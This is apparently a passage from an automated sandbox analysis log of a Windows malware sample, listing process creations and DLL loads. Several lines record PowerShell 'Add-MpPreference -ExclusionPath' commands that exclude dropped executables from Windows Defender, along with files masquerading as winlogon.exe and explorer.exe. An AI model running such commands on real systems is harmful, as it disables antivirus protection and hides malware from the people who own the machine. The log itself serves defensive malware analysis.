                                    Source: C:\Browserhost\intoHostperf.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Saved Games\LaSqLWtOcizKrlm.exe'
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Browserhost\intoHostperf.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\SoftwareDistribution\winlogon.exe'
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Browserhost\intoHostperf.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\NetHood\explorer.exe'
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Browserhost\intoHostperf.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Browserhost\LaSqLWtOcizKrlm.exe'
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Browserhost\intoHostperf.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Browserhost\intoHostperf.exe'
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: unknownProcess created: C:\ProgramData\SoftwareDistribution\winlogon.exe "C:\Users\All Users\SoftwareDistribution\winlogon.exe"
                                    Source: unknownProcess created: C:\ProgramData\SoftwareDistribution\winlogon.exe "C:\Users\All Users\SoftwareDistribution\winlogon.exe"
                                    Source: C:\Browserhost\intoHostperf.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ZtWwdj1Vck.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: unknownProcess created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exe C:\Users\Default\NetHood\explorer.exe
                                    Source: unknownProcess created: C:\Browserhost\intoHostperf.exe C:\Browserhost\intoHostperf.exe
                                    Source: unknownProcess created: C:\Browserhost\intoHostperf.exe C:\Browserhost\intoHostperf.exe
                                    Source: C:\Windows\System32\PING.EXEProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Users\user\Desktop\DCobxod.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Browserhost\H1Tsc0Ilqr3tfV2ZqDRU0epu1xRlbvhuJExp.vbe" Jump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Browserhost\I0GR.bat" "Jump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Browserhost\intoHostperf.exe "C:\Browserhost/intoHostperf.exe"Jump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\y4s1cmk0\y4s1cmk0.cmdline"Jump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\smysgui2\smysgui2.cmdline"Jump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\upfc.exe'Jump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Saved Games\LaSqLWtOcizKrlm.exe'Jump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\SoftwareDistribution\winlogon.exe'Jump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\NetHood\explorer.exe'Jump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Browserhost\LaSqLWtOcizKrlm.exe'Jump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Browserhost\intoHostperf.exe'Jump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ZtWwdj1Vck.bat" Jump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFE67.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC93052B3B6324D99AC47AF4632C48EC.TMP"Jump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD.tmp" "c:\Windows\System32\CSCC80490C767BA46838348DF24F5FE6FCA.TMP"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                    Source: C:\Users\user\Desktop\DCobxod.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                    Source: C:\Users\user\Desktop\DCobxod.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                    Source: C:\Users\user\Desktop\DCobxod.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                    Source: C:\Users\user\Desktop\DCobxod.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                    Source: C:\Users\user\Desktop\DCobxod.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
                                    Source: C:\Users\user\Desktop\DCobxod.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Users\user\Desktop\DCobxod.exeSection loaded: dxgidebug.dllJump to behavior
                                    Source: C:\Users\user\Desktop\DCobxod.exeSection loaded: sfc_os.dllJump to behavior
                                    Source: C:\Users\user\Desktop\DCobxod.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\DCobxod.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Users\user\Desktop\DCobxod.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Users\user\Desktop\DCobxod.exeSection loaded: dwmapi.dllJump to behavior
                                    Source: C:\Users\user\Desktop\DCobxod.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Users\user\Desktop\DCobxod.exeSection loaded: riched20.dllJump to behavior
                                    Source: C:\Users\user\Desktop\DCobxod.exeSection loaded: usp10.dllJump to behavior
                                    Source: C:\Users\user\Desktop\DCobxod.exeSection loaded: msls31.dllJump to behavior
                                    Source: C:\Users\user\Desktop\DCobxod.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Users\user\Desktop\DCobxod.exeSection loaded: windowscodecs.dllJump to behavior
                                    Source: C:\Users\user\Desktop\DCobxod.exeSection loaded: textshaping.dllJump to behavior
                                    Source: C:\Users\user\Desktop\DCobxod.exeSection loaded: textinputframework.dllJump to behavior
                                    Source: C:\Users\user\Desktop\DCobxod.exeSection loaded: coreuicomponents.dllJump to behavior
                                    Source: C:\Users\user\Desktop\DCobxod.exeSection loaded: coremessaging.dllJump to behavior
                                    Source: C:\Users\user\Desktop\DCobxod.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\Users\user\Desktop\DCobxod.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\Desktop\DCobxod.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\Desktop\DCobxod.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\Desktop\DCobxod.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Users\user\Desktop\DCobxod.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Users\user\Desktop\DCobxod.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Users\user\Desktop\DCobxod.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Users\user\Desktop\DCobxod.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Users\user\Desktop\DCobxod.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Users\user\Desktop\DCobxod.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Users\user\Desktop\DCobxod.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\DCobxod.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Users\user\Desktop\DCobxod.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Users\user\Desktop\DCobxod.exeSection loaded: policymanager.dllJump to behavior
                                    Source: C:\Users\user\Desktop\DCobxod.exeSection loaded: msvcp110_win.dllJump to behavior
                                    Source: C:\Users\user\Desktop\DCobxod.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Users\user\Desktop\DCobxod.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Users\user\Desktop\DCobxod.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Users\user\Desktop\DCobxod.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Users\user\Desktop\DCobxod.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Users\user\Desktop\DCobxod.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\Desktop\DCobxod.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\Desktop\DCobxod.exeSection loaded: pcacli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\DCobxod.exeSection loaded: mpr.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeSection loaded: ktmw32.dllJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeSection loaded: wbemcomn.dllJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeSection loaded: dlnashext.dllJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeSection loaded: wpdshext.dllJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Recovery\upfc.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Recovery\upfc.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Recovery\upfc.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Recovery\upfc.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Recovery\upfc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Recovery\upfc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Recovery\upfc.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Recovery\upfc.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Recovery\upfc.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Recovery\upfc.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Recovery\upfc.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Recovery\upfc.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Recovery\upfc.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Recovery\upfc.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Recovery\upfc.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Recovery\upfc.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Recovery\upfc.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Recovery\upfc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Recovery\upfc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Recovery\upfc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Recovery\upfc.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Recovery\upfc.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Recovery\upfc.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Recovery\upfc.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Recovery\upfc.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Recovery\upfc.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Recovery\upfc.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Recovery\upfc.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exeSection loaded: mscoree.dll
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exeSection loaded: apphelp.dll
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exeSection loaded: version.dll
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exeSection loaded: uxtheme.dll
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exeSection loaded: windows.storage.dll
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exeSection loaded: wldp.dll
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exeSection loaded: profapi.dll
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exeSection loaded: cryptsp.dll
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exeSection loaded: rsaenh.dll
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exeSection loaded: cryptbase.dll
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exeSection loaded: sspicli.dll
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeSection loaded: mscoree.dll
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeSection loaded: apphelp.dll
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeSection loaded: version.dll
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeSection loaded: uxtheme.dll
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeSection loaded: windows.storage.dll
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeSection loaded: wldp.dll
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeSection loaded: profapi.dll
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeSection loaded: cryptsp.dll
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeSection loaded: rsaenh.dll
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeSection loaded: cryptbase.dll
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeSection loaded: sspicli.dll
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeSection loaded: mscoree.dll
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeSection loaded: version.dll
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeSection loaded: uxtheme.dll
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeSection loaded: windows.storage.dll
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeSection loaded: wldp.dll
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeSection loaded: profapi.dll
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeSection loaded: cryptsp.dll
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeSection loaded: rsaenh.dll
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeSection loaded: cryptbase.dll
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
